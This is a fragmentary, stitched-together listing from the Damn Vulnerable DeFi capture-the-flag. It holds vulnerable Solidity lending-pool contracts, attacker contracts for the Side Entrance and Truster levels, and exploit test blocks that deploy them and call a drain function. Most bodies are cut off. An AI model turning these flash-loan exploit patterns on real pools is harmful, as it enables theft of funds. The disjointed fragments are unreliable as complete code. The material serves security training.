// SPDX-License-Identifier: MIT | |
pragma solidity ^0.8.0; | |
import '@openzeppelin/contracts/token/ERC20/ERC20.sol'; | |
import '@openzeppelin/contracts/access/AccessControl.sol'; | |
/** | |
* @title RewardToken | |
* @author Damn Vulnerable DeFi (https://damnvulnerabledefi.xyz) | |
* @dev A mintable ERC20 with 2 decimals to issue rewards |
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.8.0; | |
import '@openzeppelin/contracts/token/ERC20/extensions/ERC20Snapshot.sol'; | |
import '@openzeppelin/contracts/access/AccessControl.sol'; | |
/** | |
* @title AccountingToken | |
* @author Damn Vulnerable DeFi (https://damnvulnerabledefi.xyz) | |
* @notice A limited pseudo-ERC20 token to keep track of deposits and withdrawals |
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.8.0; | |
import "../side-entrance/SideEntranceLenderPool.sol"; | |
contract SideEntranceAttack { | |
SideEntranceLenderPool immutable pool; | |
address immutable owner; | |
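/// @notice Accepts plain ether transfers (calls with empty calldata).
/// @dev The body is empty, so any value sent is simply added to this
///      contract's balance. Presumably needed so ether can be sent to this
///      contract from the pool; confirm against the rest of the contract,
///      which is not visible in this listing.
receive() external payable {}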
it('Exploit', async function () { | |
/** CODE YOUR EXPLOIT HERE */ | |
// Deploy attacker contract | |
const SideEntranceAttack = await ethers.getContractFactory('SideEntranceAttack', attacker) | |
attackContract = await SideEntranceAttack.deploy(this.pool.address) | |
// Log before attack | |
console.log( | |
'POOL BALANCE BEFORE ATTACK: ', | |
String(await ethers.provider.getBalance(this.pool.address)) |
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.8.0; | |
import '@openzeppelin/contracts/utils/Address.sol'; | |
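/**
 * @title IFlashLoanEtherReceiver
 * @notice Declares the single payable `execute()` entry point.
 * @dev Judging by the name, the lender pool invokes this on the borrower
 *      during a flash loan; confirm against the pool's loan function, which
 *      is not visible in this listing. Any call through this interface hands
 *      control (and the attached value) to code the caller does not control,
 *      so the calling contract should treat it as an untrusted external call.
 */
interface IFlashLoanEtherReceiver {
    /// @notice Callback that may receive ether along with the call.
    function execute() external payable;
}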
contract SideEntranceLenderPool { | |
using Address for address payable; |
object "Contract" { | |
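code {
    // Deployment code: copy the "runtime" sub-object into memory at offset 0
    // and return it, so that those bytes become the deployed contract code.
    datacopy(0, dataoffset("runtime"), datasize("runtime"))
    return(0, datasize("runtime"))
}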
object "runtime" { | |
code { | |
if iszero(calledByOwner()) { revert(0, 0) } | |
switch selector() | |
case 0x00 { |
/** | |
* @dev Performs a Solidity function call using a low level `call`. A | |
* plain `call` is an unsafe replacement for a function call: use this | |
* function instead. | |
* | |
* If `target` reverts with a revert reason, it is bubbled up by this | |
* function (like regular Solidity function calls). | |
* | |
* Returns the raw returned data. To convert to the expected return value, | |
* use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`]. |
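// Challenge solution step for the Truster level. A regular `function` (not an
// arrow function) is used because the body reads fixtures from the Mocha
// context (`this.token`, `this.pool`), which are set up outside this listing.
it('Exploit', async function () {
  /** CODE YOUR EXPLOIT HERE */

  // Deploy attacker contract, signed by `attacker`, with the token and pool
  // addresses as constructor arguments. The instance is stored on the Mocha
  // context so later hooks can reach it.
  const TrusterAttack = await ethers.getContractFactory('TrusterAttack', attacker);
  this.attackContract = await TrusterAttack.deploy(this.token.address, this.pool.address);

  // Call the drain() function as `attacker`. What drain() does is defined in
  // the TrusterAttack contract, whose body is not visible in this listing.
  await this.attackContract.connect(attacker).drain();
});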
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.8.0; | |
import "@openzeppelin/contracts/token/ERC20/IERC20.sol"; | |
import "../truster/TrusterLenderPool.sol"; | |
contract TrusterAttack { | |
IERC20 immutable dvt; | |
TrusterLenderPool immutable pool; | |
address immutable owner; |
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.8.0; | |
import "@openzeppelin/contracts/token/ERC20/IERC20.sol"; | |
import "@openzeppelin/contracts/utils/Address.sol"; | |
import "@openzeppelin/contracts/security/ReentrancyGuard.sol"; | |
contract TrusterLenderPool is ReentrancyGuard { | |
using Address for address; |